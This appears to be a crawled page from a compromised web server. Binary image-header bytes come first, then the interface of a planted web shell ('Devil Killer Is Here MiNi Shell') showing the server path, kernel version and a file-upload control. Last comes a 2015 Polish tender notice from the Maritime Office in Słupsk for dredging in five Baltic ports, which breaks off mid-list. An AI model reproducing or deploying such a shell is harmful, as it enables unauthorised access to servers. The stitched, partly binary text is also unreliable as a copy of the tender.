JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150320/39631-N-2015.html

<p class="kh_header"><b>Słupsk: Roboty czerpalne na terenach administrowanych przez Urząd Morski w Słupsku</b><br>
<b>Numer ogłoszenia: 39631 - 2015; data zamieszczenia: 20.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Morski w Słupsku , Al. Sienkiewicza 18, 76-200 Słupsk, woj. pomorskie, tel. 059 8428406, faks 059 8428406, 8412443.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umsl.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty czerpalne na terenach administrowanych przez Urząd Morski w Słupsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót czerpalnych na terenach administrowanych przez Urząd Morski w Słupsku, w ilości szacunkowej 36 500 m3.
2.	Zamawiający podzielił przedmiot zamówienia na pięć zadań: 
2.1.	zadanie nr 1 - roboty czerpalne w Porcie Łeba w ilości szacunkowej 10 000 m3,
2.2.	zadanie nr 2 - roboty czerpalne w Porcie Ustka w ilości szacunkowej 7 500 m3,
2.3.	zadanie nr 3 - roboty czerpalne w Porcie Darłowo w ilości szacunkowej 11 000 m3,
2.4.	zadanie nr 4 - roboty czerpalne w Porcie Kołobrzeg w ilości szacunkowej 6 000 m3,
2.5.	zadanie nr 5 - roboty czerpalne w Porcie Dźwirzyno w ilości szacunkowej 2 000 m3.
3.	Szczegółowy opis przedmiotu zamówienia:
3.1.	zadania obejmują roboty podczyszczeniowe w portach Łeba, Ustka, Darłowo, Kołobrzeg oraz Dźwirzynie - czerpanie i wywóz urobku o łącznej szacunkowej ilości 36 500 m3:
a)zadanie nr 1 - tor wodny oraz podejściowy Portu Łeba - czerpanie i wywóz urobku na klapowisko w morzu na odległość do 2 Mm  o łącznej ilości szacunkowej 10 000 m3;
b)zadanie nr 2 - tor wodny Portu Ustka - czerpanie i wywóz urobku na klapowisko w morzu  na odległość do 3 Mm o łącznej ilości szacunkowej 7 500 m3;
c)zadanie nr 3 - tor wodny Portu Darłowo - czerpanie i wywóz urobku na klapowisko w morzu  na odległość do 3,5 Mm o łącznej ilości szacunkowej 11 000 m3;
d)zadanie nr 4 - tor wodny Portu Kołobrzeg - czerpanie i wywóz urobku na klapowisko w morzu na odległość do 4,5 Mm  o łącznej ilości szacunkowej 6 000 m3;
e)zadanie nr 5 - tor podejściowy Portu Dźwirzyno - czerpanie i wywóz urobku na klapowisko w morzu na odległość do 7,8 Mm  o łącznej ilości szacunkowej 2 000 m3 lub czerpanie z toru podejściowego, a następnie refulacja urobku na plażę rurociągiem o wydolności tłoczenia na odległość minimum 1,0 km;
3.3.2.	w zakresie przedmiotu zamówienia Wykonawca zobowiązany jest również do:
a)pobrania i zbadania próbek urobku - koniecznych do uzyskania zezwolenia opisanego w ppkt. b):
Łeba - 4 próbki,
Ustka - 4 próbki,
Darłowo - 4 próbki,
Kołobrzeg - 4 próbki,
Dźwirzyno - 3 próbki;
b)złożenia wniosku oraz uzyskania zezwolenia na usuwanie do morza urobku z pogłębiania dna zgodnie z zapisami paragrafu 2 rozporządzenia Ministra Transportu i Budownictwa z dnia 26 stycznia 2006 r.  w sprawie trybu wydawania zezwoleń na usuwanie do morza urobku z pogłębiania dna oraz na zatapianie w morzu odpadów lub innych substancji (Dz. U. z 2006 r. Nr 22, poz. 166).
4.Planowany zakres robót (lokalizacja, wielkość, warunki techniczne prac) w poszczególnych portach przedstawiony został w załączonych do SIWZ projektach wykonawczych na roboty czerpalne dla portów w Łebie, Ustce, Darłowie, Kołobrzegu oraz Dźwirzynie w 2015 r. (załączniki nr od 7 do 11 do SIWZ). Dokumentacja projektowa na poszczególne porty uwzględnia szacunkową ilość wydobycia urobku. Szczegółowy zakres zostanie ustalony między stronami po wykonaniu sondaży przedwykonawczych przez Zamawiającego. 
5.W okresie lipiec i sierpień nie przewiduje się realizacji robót czerpalnych, jednak w wyjątkowych sytuacjach, które mogą wyniknąć z nagłego pogorszenia głębokości nawigacyjnej, Zamawiający może wezwać Wykonawcę do wykonania robót czerpalnych w portach i na torach podejściowych. 
6.Dane na temat infrastruktury zapewniającej dostęp do portów przedstawiają się następująco:
6.1.	Port Łeba:
tor podejściowy z morza pełnego do głowicy falochronu zachodniego o kierunku rzeczywistym 203o (w polu widzenia białego sektora światła podejściowego) o parametrach: długość 926 m, szerokość w dnie 40 m, głębokość 3,5 m na długości 300 m od głowicy falochronu zachodniego w kierunku morza i 5 m na pozostałej długości toru;
tor wodny od głowicy falochronu zachodniego do obrotnicy o parametrach: długość 1160 m, szerokość 20 m w osi kanału, głębokość 3,5 m;
obrotnica w rozwidleniu kanału i basenu rybackiego: średnica - 50 m, głębokość - 3,5m;
stwierdza się lokalne spłycenia -2,0 m na redzie oraz -3,0 m na torze wodnym Portu Łeba.
6.2.	Port Ustka:
tor podejściowy z morza pełnego do głowicy falochronu wschodniego kierunku 180o, o parametrach: długość 962 m, szerokość w dnie 60 m, głębokość 6,5 m;
tor wodny od falochronu wschodniego do fabryki lodu o parametrach: długość 1250 m, szerokość 24 m w osi kanału portowego, głębokość 5,5 m;
obrotnica trawers kapitanatu szerokość 67 m, głębokość 5,5 m.  
6.3.	Port Darłowo:
tor podejściowy z morza pełnego do głowicy falochronu wschodniego o kierunku 116o, o parametrach: długość 926 m, szerokość w dnie 60 m, głębokość 8 m;
tor wodny od głowicy falochronu wschodniego do obrotnicy o parametrach: długość 2420m - 23 m w osi kanału portowego, głębokość 5,5 m;
obrotnica rozgałęzienie kanału i wejście do basenu przemysłowego: średnica 110 m, głębokość 5,5 m.
6.4.	Port Kołobrzeg:
tor podejściowy z morza pełnego do głowicy falochronu wschodniego o kierunku 150o w odległości 300m od głowicy wschodniego falochronu kierunek 122o o parametrach: długość 926 m, szerokość w dnie - 80 m, głębokość - 8 m;
tor wodny od głowicy falochronu wschodniego do obrotnicy w rozwidleniu kanałów o parametrach: długość 1040 m, szerokość 24 m, głębokość 6 m, a następnie od obrotnicy do głowicy wschodniej wejścia do Basenu Jachtowego o parametrach: szerokość 12 m, głębokość 6 m, a od zjazdu RORO  do wejścia do Basenu Jachtowego głębokość 3,5 m;
obrotnica w rozwidleniu kanałów: średnica 140 m, głębokość 6 m;
osadnik na rzece Parsęta na wschód od wejścia do Basenu Jachtowego.
6.5.	Port Dźwirzyno
tor podejściowy z morza pełnego do głowic falochronów w linii białego przerywanego światła nawigacyjnego do punktu położonego pośrodku linii łączącej światła wejściowe  do portu na głowicach falochronów  o kierunku 157o, o parametrach: długość 200 m, szerokość w dnie 20 m, głębokość 1,6 m;
tor wodny od głowicy falochronu wschodniego do mostu drogowego o parametrach: długość 350m, szerokość 10 m w osi kanału portowego, głębokość 1,5 m;
7.  Wielkości przedmiotu zamówienia w każdym zadaniu podane w 3.2. SIWZ zostały określone szacunkowo. Faktyczny zakres robót w każdym z zadań będzie określany stanem aktualnej sytuacji batymetrycznej akwenów wodnych, na których mają być wykonywane roboty. Zamawiający ma prawo zmniejszyć zakres robót określony szacunkowo dla każdego zadania nie więcej niż o 20%.
8. Rozliczenie robót:
8.1.	wykonywanych w kanałach portowych - nastąpi na podstawie ilości wydobytego urobku,   obliczonego jako różnica sondaży przed rozpoczęciem prac i po ich zakończeniu;
8.2.	wykonywanych na torach podejściowych - nastąpi na podstawie ilości wydobytego urobku, obliczonego jako różnica sondaży przed rozpoczęciem prac i po ich zakończeniu z zastrzeżeniem pkt. 3.11.
9. Sondaże przed rozpoczęciem prac i po ich zakończeniu będą wykonywane przez Zamawiającego. 
10.Zamawiający w wyjątkowych sytuacjach może zlecić pomiary sondażowe firmie zewnętrznej lub Wykonawcy robót z zastrzeżeniem, że w trakcie pomiarów musi być obecny przedstawiciel Zamawiającego.
11.W sytuacjach, gdy siła wiatru z kierunków od strony morza (tj. zachodnich poprzez północne do wschodnich) przekraczać będzie 60B (siła wiatru wg informacji zapisanej w dzienniku portowym bosmanatu portu) oraz stwierdzi się silny ruch rumowiska (różnica pomiędzy pomiarami sondażowymi, a pomiarami szaland lub i ładowni przekroczy 35%) rozliczenie robót na redach portów może nastąpić na podstawie obmiaru ilości wydobytego urobku obliczanego jako iloczyn ilości kursów pogłębiarek (szaland) i ich pojemności ładunkowej (jednej pogłębiarki - szalandy). Jednakże Zamawiający obliczoną w ten sposób przez Wykonawcę kubaturę robót może zweryfikować poprzez kontrolę zgłoszonych kubatur do Bosmanatu Portu, przy czym Wykonawca ma obowiązek zgłaszania każdorazowo swoich pomiarów szaland i ładowni. Ogólna kubatura robót do rozliczenia z Wykonawcą będzie pomniejszona o współczynnik  spulchnienia 0,95. Jeżeli Zamawiający stwierdzi, że obliczona przez Wykonawcę kubatura różni się od zapisów w dzienniku portowym Bosmanatu Portu może skorygować podaną kubaturę. W przypadku wystąpienia tej różnicy podstawą rozliczenia kubatury do ustalenia wynagrodzenia Wykonawcy, będą dane z Bosmanatu Portu. Zamawiający nadto będzie kontrolował podawaną kubaturę ładowni i szaland przez Wykonawcę. W przypadku, jeśli dwie kontrole będą różnić się na niekorzyść Zamawiającego (min. 5%) Wykonawca nie ma prawa żądać rozliczenia prac wg obmiaru ilości wydobytego urobku obliczanego jako iloczyn ilości kursów pogłębiarek (szaland) i ich pojemności ładunkowej (jednej pogłębiarki - szalandy), a rozliczenie nastąpi wg sondaży.
12.Zamawiający ustala tolerancję bagrowniczą, która wynosi w poziomie +1,0m, w pionie ?0,3m w kanałach portowych i torach podejściowych oraz ? 0,4m na osadnikach red.
13.Zamawiający odrębnym zleceniem określa zakres robót wyszczególnionych w punkcie 3.3.1. SIWZ. Zlecenie określać będzie ilość urobku oraz akwen robót podczyszczeniowych.  
14.Wykonawca zobowiązany jest do  należytego wykonania robót, zgodnie z warunkami określonymi przez Zamawiającego. W przypadku przekroczenia maksymalnej rzędnej (przegłębienie), wskazanej w zleceniu wykonania pojedynczego zadania, w końcowym rozliczeniu ilość m3 wynikająca z wyliczenia w sposób podany w pkt 3.8. będzie pomniejszona przez Zamawiającego o wielkość tego przegłębienia. Wynagrodzenie za przegłębienie nie przysługuje.
15.Wykonawca jest zobowiązany przystąpić do prac będących przedmiotem umowy, nie później niż w ciągu 7 dni od otrzymania pisemnego zlecenia ich wykonania na wskazanym akwenie. Zlecenie powinno zawierać wszystkie informacje niezbędne do jego realizacji.
16.Wykonawca ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.
17.Wykonawca powinien dysponować sprzętem umożliwiającym prawidłową realizację robót.
18.W przypadku stwierdzenia, że roboty wykonane są niezgodnie z obowiązującymi przepisami i ustaleniami, Zamawiający może odmówić zapłaty i żądać  ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy.
19.Wykonawca zobowiązany jest do pokrycia kosztów postoju jednostek, które będą realizować roboty związane z przedmiotem zamówienia. 
20.	Opis przedmiotu za pomocą kodów CPV Wspólnego Słownika Zamówień:
45244000-9 Wodne roboty budowlane.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego na podstawie art. 67 ust. 1 pkt. 6 ustawy do 50% wartości szacunkowej zamówienia, polegającego na zwiększaniu ilości robót czerpalnych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:
zadanie nr 1: 12 000,00 (dwanaście tysięcy złotych);
zadanie nr 2: 9 000,00 (dziewięć tysięcy złotych);
zadanie nr 3: 13 000,00 (trzynaście tysięcy złotych);
zadanie nr 4: 7 000,00 (siedem tysięcy złotych);
zadanie nr 5: 3 000,00 (trzy tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca dysponuje lub celem realizacji przedmiotu zamówienia będzie dysponował:
1.	w przypadku składania oferty na realizację od jednego do trzech zadań:
a)	  minimum jedną pogłębiarką do wykonywania robót czerpalnych w portach, przystosowaną do współpracy z szalandą, posiadającą odpowiednie aktualne dokumenty bezpieczeństwa oraz świadectwo klasy niniejszej jednostki pływającej umożliwiającej wykonywanie prac na akwenie planowanych robót wraz z klapowiskiem, oraz
b)	  minimum jedną szalandą do transportu urobku na klapowisko, posiadającą odpowiednie aktualne dokumenty bezpieczeństwa oraz świadectwo klasy niniejszej jednostki pływającej umożliwiającej wykonywanie prac na akwenie planowanych robót wraz z klapowiskiem;
2.	przy składaniu oferty na realizację więcej niż trzech zadań:
a)	minimum dwiema pogłębiarkami do wykonywania robót czerpalnych w portach, przystosowanymi do współpracy z szalandą, posiadającymi odpowiednie aktualne dokumenty bezpieczeństwa oraz świadectwa klasy niniejszych jednostek pływających umożliwiające wykonywanie prac na akwenie planowanych robót wraz z klapowiskiem, oraz
b)	 minimum dwiema szalandami do transportu urobku na klapowisko, posiadającymi odpowiednie aktualne dokumenty bezpieczeństwa oraz świadectwo klasy niniejszej jednostki pływającej umożliwiającej wykonywanie prac na akwenie planowanych robót wraz z klapowiskiem;
3.	przy składaniu oferty na realizację zadania nr 1, w ramach warunków o których mowa w pkt. 1. i 2., Wykonawca powinien dysponować pogłębiarką do wykonywania robót czerpalnych w portach o zanurzeniu nie większym niż 3 m, przystosowaną do współpracy z szalandą, posiadającą odpowiednie aktualne dokumenty bezpieczeństwa oraz świadectwo klasy niniejszej jednostki pływającej umożliwiającej wykonywanie prac na akwenie planowanych robót wraz z klapowiskiem;
4.w przypadku składania oferty na realizację zadania nr 5 Wykonawca powinien dysponować pogłębiarką ssąco-refulacyjną z możliwością poboru urobku z głębokości min. 4 m lub pogłębiarką  i szlandą określoną w pkt 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w zakresie:
1.	  cen brutto realizacji robót na skutek zmiany obowiązującego podatku od towarów i usług VAT, o ile okoliczności te powodują konieczność zmiany ceny wg obowiązujących stawek podatku VAT, przy czym ceny netto są stałe przez cały okres obowiązywania umowy;
2.	  terminu wykonania przedmiotu umowy:
a)	  o termin, w którym stwierdzi się niekorzystne warunki pogodowe uniemożliwiające prowadzenie robót czerpalnych. Zamawiający za niekorzystne warunki pogodowe uznaje warunki, gdy siła wiatru z kierunków od strony morza (tj. zachodnich poprzez północne do wschodnich) przekraczać będzie 40 B (siła wiatru wg informacji zapisanej w dzienniku portowym bosmanatu portu) lub utrzymywanie się temperatury minusowej, która z uwagi na zalodzenie spowoduje brak możliwości wykonania przedmiotu umowy (stan zalodzenia jednostki  oraz stan zalodzenia akwenu na którym będą prowadzone prace potwierdzany będzie przez pracowników bosmanatu portu);
b)	  w przypadku opóźnień wywołanych potrzebą otrzymania niezbędnych decyzji administracyjnych o środowiskowych uwarunkowaniach,  o ilość dni wynikającą z opóźnienia w ich uzyskaniu;
c)	  w przypadku wystąpienia nieprzewidzianych prac saperskich, o ilość dni wynikającą z opóźnienia w ich wykonaniu;
- o ile okoliczności te powodują konieczność zmiany terminu i zmiany w tym zakresie będą dokonane, z uwzględnieniem okresów niezbędnych do przesunięcia terminu wykonania umowy;
3.	zmiany lub rezygnacji z podwykonawcy na uzasadniony wniosek Wykonawcy, z uwzględnieniem zapisów  pkt. 11.3. SIWZ;
